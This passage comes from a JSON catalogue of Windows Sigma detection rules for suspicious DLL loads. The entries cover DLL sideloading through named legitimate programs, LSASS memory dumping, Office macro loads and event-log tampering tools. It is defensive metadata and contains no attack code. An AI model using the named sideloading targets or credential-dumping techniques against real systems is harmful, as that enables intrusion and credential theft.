"attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "060d5ad4-3153-47bb-8382-43e5e29eda92", "value": "Unsigned Module Loaded by ClickOnce Application" }, { "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", "meta": { "author": "Antonlovesdnb", "creation_date": "2020-02-19", "falsepositive": [ "Legitimate macro usage. Add the appropriate filter according to your environment" ], "filename": "image_load_office_vbadll_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_vbadll_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "value": "VBA DLL Loaded Via Office Application" }, { "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", "meta": { "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "creation_date": "2019-10-27", "falsepositive": [ "Unknown" ], "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "value": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded" }, { "description": "Detects DLL sideloading of unsigned \"mfdetours.dll\". Executing \"mftrace.exe\" can be abused to attach to an arbitrary process and force load any DLL named \"mfdetours.dll\" from the current directory of execution.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-11", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_mfdetours_unsigned.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_mfdetours_unsigned.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "948a0953-f287-4806-bbcb-3b2e396df89f", "value": "Unsigned Mfdetours.DLL Sideloading" }, { "description": "Detects processes loading modules related to PCRE.NET package", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-29", "falsepositive": [ "Unknown" ], "filename": "image_load_dll_pcre_dotnet_dll_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://twitter.com/rbmaslen/status/1321859647091970051", "https://twitter.com/tifkin_/status/1321916444557365248", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_pcre_dotnet_dll_load.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84b0a8f3-680b-4096-a45b-e9a89221727c", "value": "PCRE.NET Package Image Load" }, { "description": "Detects loading and execution of an unsigned thor scanner binary.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-10-29", "falsepositive": [ "Other legitimate binaries named \"thor.exe\" that aren't published by Nextron Systems" ], "filename": "image_load_thor_unsigned_execution.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_thor_unsigned_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ea5c131b-380d-49f9-aeb3-920694da4d4b", "value": "Suspicious Unsigned Thor Scanner Execution" }, { "description": "Detects potential DLL sideloading of \"libvlc.dll\", a DLL that is legitimately used by \"VLC.exe\"", "meta": { "author": "X__Junior", "creation_date": "2023-04-17", "falsepositive": [ "False positives are expected if VLC is installed in non-default locations" ], "filename": "image_load_side_load_libvlc.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html", "https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_libvlc.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bf9808c4-d24f-44a2-8398-b65227d406b6", "value": "Potential Libvlc.DLL Sideloading" }, { "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-22", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "90ae0469-0cee-4509-b67f-e5efcef040f7", "value": "Aruba Network Service Potential DLL Sideloading" }, { "description": "Detects potential DLL sideloading of \"ShellDispatch.dll\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-20", "falsepositive": [ "Some installers may trigger some false positives" ], "filename": "image_load_side_load_shelldispatch.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_shelldispatch.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "844f8eb2-610b-42c8-89a4-47596e089663", "value": "Potential ShellDispatch.DLL Sideloading" }, { "description": "Detects CLR DLL being loaded by an Office Product", "meta": { "author": "Antonlovesdnb", "creation_date": "2020-02-19", "falsepositive": [ "Unknown" ], "filename": "image_load_office_dotnet_clr_dll_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_dotnet_clr_dll_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d13c43f0-f66b-4279-8b2c-5912077c1780", "value": "CLR DLL Loaded Via Office Applications" }, { "description": "Detects loading of \"Amsi.dll\" by a living of the land process. This could be an indication of a \"PowerShell without PowerShell\" attack", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-01", "falsepositive": [ "Unknown" ], "filename": "image_load_dll_amsi_suspicious_process.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_amsi_suspicious_process.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "6ec86d9e-912e-4726-91a2-209359b999b9", "value": "Amsi.DLL Loaded Via LOLBIN Process" }, { "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "creation_date": "2022-12-16", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_comctl32.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", "https://github.com/binderlabs/DirCreate2System", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_comctl32.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6360757a-d460-456c-8b13-74cf0e60cceb", "value": "Potential DLL Sideloading Via comctl32.dll" }, { "description": "Detects the image load of \"Python Core\" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe.", "meta": { "author": "Patrick St. John, OTR (Open Threat Research)", "creation_date": "2020-05-03", "falsepositive": [ "Legitimate Py2Exe Binaries", "Known false positive caused with Python Anaconda" ], "filename": "image_load_susp_python_image_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/", "https://www.py2exe.org/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_python_image_load.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.002" ] }, "related": [ { "dest-uuid": "deb98323-e13f-4b0c-8d94-175379069062", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cbb56d62-4060-40f7-9466-d8aaf3123f83", "value": "Python Image Load By Non-Python Process" }, { "description": "Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.\nThis library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.\nIt could also be used for anti-analysis purposes by shut downing specific processes.\n", "meta": { "author": "Luc Génaux", "creation_date": "2023-11-28", "falsepositive": [ "Processes related to software installation" ], "filename": "image_load_dll_rstrtmgr_suspicious_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/windows-restart-manager-part-1/", "https://www.crowdstrike.com/blog/windows-restart-manager-part-2/", "https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/", "https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_rstrtmgr_suspicious_load.yml" ], "tags": [ "attack.impact", "attack.defense-evasion", "attack.t1486", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b48492dc-c5ef-4572-8dff-32bc241c15c8", "value": "Load Of RstrtMgr.DLL By A Suspicious Process" }, { "description": "Detects potential DLL side loading of DLLs that are part of the Wazuh security platform", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-03-13", "falsepositive": [ "Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)" ], "filename": "image_load_side_load_wazuh.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_wazuh.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", "value": "Potential Wazuh Security Platform DLL Sideloading" }, { "description": "Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-28", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_vmmap_dbghelp_unsigned.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "273a8dd8-3742-4302-bcc7-7df5a80fe425", "value": "VMMap Unsigned Dbghelp.DLL Potential Sideloading" }, { "description": "Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-12", "falsepositive": [ "Some tuning might be required to allow or remove certain locations used by the rule if you consider them as safe locations" ], "filename": "image_load_office_excel_xll_susp_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/", "https://www.mandiant.com/resources/blog/lnk-between-browsers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_excel_xll_susp_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "af4c4609-5755-42fe-8075-4effb49f5d44", "value": "Microsoft Excel Add-In Loaded From Uncommon Location" }, { "description": "Detects potential DLL sideloading of rcdll.dll", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-03-13", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_rcdll.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_rcdll.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e78b74f-c762-4800-82ad-f66787f10c8a", "value": "Potential Rcdll.DLL Sideloading" }, { "description": "Detects DLL sideloading of \"dbgcore.dll\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "creation_date": "2022-10-25", "falsepositive": [ "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "filename": "image_load_side_load_dbgcore.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbgcore.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9ca2bf31-0570-44d8-a543-534c47c33ed7", "value": "Potential DLL Sideloading Of DBGCORE.DLL" }, { "description": "Detects potential sideloading of \"mpclient.dll\" by Windows Defender processes (\"MpCmdRun\" and \"NisSrv\") from their non-default directory.", "meta": { "author": "Bhabesh Raj", "creation_date": "2022-08-02", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_windows_defender.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_windows_defender.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", "value": "Potential Mpclient.DLL Sideloading" }, { "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml" ], "tags": [ "attack.execution", "attack.t1047", "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7707a579-e0d8-4886-a853-ce47e4575aaa", "value": "Wmiprvse Wbemcomn DLL Hijack" }, { "description": "Detects potential DLL sideloading of \"libcurl.dll\" by the \"gup.exe\" process from an uncommon location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-05", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_gup_libcurl.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_gup_libcurl.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e49b5745-1064-4ac1-9a2e-f687bc2dd37e", "value": "Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE" }, { "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-09-07", "falsepositive": [ "Other DLLs with the same Imphash" ], "filename": "image_load_hktl_sharpevtmute.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/bats3c/EvtMute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_hktl_sharpevtmute.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "49329257-089d-46e6-af37-4afce4290685", "value": "HackTool - SharpEvtMute DLL Load" }, { "description": "Detects potential DLL sideloading of \"CCleanerReactivator.dll\"", "meta": { "author": "X__Junior", "creation_date": "2023-07-13", "falsepositive": [ "False positives could occur from other custom installation paths. Apply additional filters accordingly." ], "filename": "image_load_side_load_ccleaner_reactivator.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://lab52.io/blog/2344-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_ccleaner_reactivator.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3735d5ac-d770-4da0-99ff-156b180bc600", "value": "Potential CCleanerReactivator.DLL Sideloading" }, { "description": "Detects potential DLL sideloading of \"AVKkid.dll\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-08-03", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_avkkid.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_avkkid.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "952ed57c-8f99-453d-aee0-53a49c22f95d", "value": "Potential AVKkid.DLL Sideloading" }, { "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", "meta": { "author": "frack113", "creation_date": "2022-12-13", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_classicexplorer32.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets", "https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_classicexplorer32.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "caa02837-f659-466f-bca6-48bde2826ab4", "value": "Potential DLL Sideloading Via ClassicExplorer32.dll" }, { "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-30", "falsepositive": [ "Unikely" ], "filename": "image_load_cmstp_load_dll_from_susp_location.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_cmstp_load_dll_from_susp_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.003" ] }, "related": [ { "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75e508f7-932d-4ebc-af77-269237a84ce1", "value": "DLL Loaded From Suspicious Location Via Cmspt.EXE" }, { "description": "Loading unsigned image (DLL, EXE) into LSASS process", "meta": { "author": "Teymur Kheirkhabarov, oscd.community", "creation_date": "2019-10-22", "falsepositive": [ "Valid user connecting using RDP" ], "filename": "image_load_lsass_unsigned_image_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_lsass_unsigned_image_load.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "857c8db3-c89b-42fb-882b-f681c7cf4da2", "value": "Unsigned Image Loaded Into LSASS Process" }, { "description": "Detects potential DLL sideloading of \"DbgModel.dll\"", "meta": { "author": "Gary Lobermier", "creation_date": "2024-07-11", "falsepositive": [ "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "filename": "image_load_side_load_dbgmodel.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/entries/microsoft/built-in/dbgmodel.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbgmodel.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fef394cd-f44d-4040-9b18-95d92fe278c0", "value": "Potential DLL Sideloading Of DbgModel.DLL" }, { "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-08", "falsepositive": [ "Legitimate macro usage. Add the appropriate filter according to your environment" ], 